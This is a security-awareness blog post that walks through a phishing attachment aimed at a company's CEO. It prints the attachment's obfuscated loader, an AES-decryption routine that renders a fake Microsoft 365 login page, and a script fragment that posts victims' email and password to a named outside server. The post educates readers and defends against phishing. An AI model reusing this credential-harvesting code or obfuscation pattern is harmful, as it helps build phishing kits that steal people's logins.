How they tried to compromise our CEO and what a phishing email contains

Are you curious about what is inside those phishing emails and how they try to steal your password?

This is the story of what happens when you click on one of the phishing emails that we receive so often. If you’ve ever been curious about how these emails work, and how they look, I will be happy to help without burdening you with tech details.

A couple of days ago our CEO received an email that looked real, but was trying to steal her password for Microsoft Office.

Note: Don’t click on links and email attachments. What I am doing here is demonstrating the content of one of these emails in a controlled sandbox environment.

Content of phishing email

This is the email. It has an attachment. Looks kind of real.

This is how the attachment looks like:

What could you do:

  1. Check the sender
  2. Ask your CTO/Admin/Security or somebody with good technical knowledge whether this email is ligit.
  3. Don’t click on attachments

The attachment is an HTM file

This file is executable on Microsoft Windows machines. Lets see the content of this file if you open it with a text editor:

A sample of it is:

<script language="javascript">document.write(unescape('%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64...')</script>

This file contains an HTML document. HTML is the format of webpages and once you click on this file it will open your web browser and the web browser will execute this file.

Note: Don’t click on such attachments.

What is unescape?

This unescape here means that the string

“‘%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64..” is encoded.

‘unescape’ is a function that changes the encoding. It is technical, but at the end the goal is to make sure this file could be read by all browsers.

The result of unescaping the content looks like:

<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.js'></script>
  <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/aes.js'></script>
  <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/pbkdf2.js'></script>
  <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/sha256.js'></script>
  <script>
  function CryptoJSAesDecrypt(passphrase, encrypted_json_string){
      var obj_json = JSON.parse(encrypted_json_string);
      var encrypted = obj_json.ciphertext;
      var salt = CryptoJS.enc.Hex.parse(obj_json.salt);
      var iv = CryptoJS.enc.Hex.parse(obj_json.iv);   
      var key = CryptoJS.PBKDF2(passphrase, salt, { hasher: CryptoJS.algo.SHA256, keySize: 64/8, iterations: 999});
      var decrypted = CryptoJS.AES.decrypt(encrypted, key, { iv: iv});
      return decrypted.toString(CryptoJS.enc.Utf8);
  }
  document.write(CryptoJSAesDecrypt('978421099', '{"ciphertext":"E8jA2IVItrQQ0SW+CsN1+bRVk2bXLpW5OefWqfRyHU0qa6qTVv379y5qP2rlaRmdNkpeHJ+5t+szBF\/V7UyFG\/dxUWfgifts\/HvH38XW0qufGiryCqLxx0oo9YYtg8Qq8N1Wqg4tNiuYsdy\/RAneSerZBDpWTwUtiDE6rx6yhRNaYpRMxsUODzToXEoGWfcoFSiSAUY3mA2rhDSNeSe9WxnrMlGxRJ5VedyYDdqz8aQ24s\/Y+nIwE

Here is what happens in the code in simple terms:

There is an encrypted text called “ciphertext” and this cipher text is decrypted and execute. This happens on the last line of the fragment above.

So the phishing main contains an attachment, this attachment is ‘escaped’ and the ‘escaped’ content is encrypted.

What’s the content of the ciphertext?

The cipher text contains a web page that you browser will visualize. It looks like a real web page. It looks like a real Microsoft 365 page.

Here is a screenshot:

Here where you see “pesho@gmail.com” you will see your personal email.
This makes the page look more real to you.

The summary for now – the phishing email contains an attachment, that has an executable HTML code that is escaped, that is also encrypted, and the encrypted content contains an HTML page that looks like Microsoft login page.

What happens when you fill your email and password?

There is a fragment of the code of the page that looks like this:

count=count+1
  $.ajax({
    dataType: 'JSON',
    url: 'https://sintracoopmn.com.br/process.php',
    type: 'POST',
    data:{
      email:email,
      password:password,
      detail:detail,

    },

This code will send you email and password to the following webaddress https://sintracoopmn.com.br/process.php

Let’s try it.

I add the username pesho@gmail.com with password ‘abcd1234’

Note that this will send my username and password to https://sintracoopmn.com.br/process.php, but will also log me in my Office 365 account.

So I will not even understand that I was compromised.

What can you do?

Add a two factor authentication.

That’s the easiest, most secure solution. Add a two factor authentication that will send you an SMS every time you login or will require you to use an authenticator app.

If you haven’t done it already, I would advice you to do it now.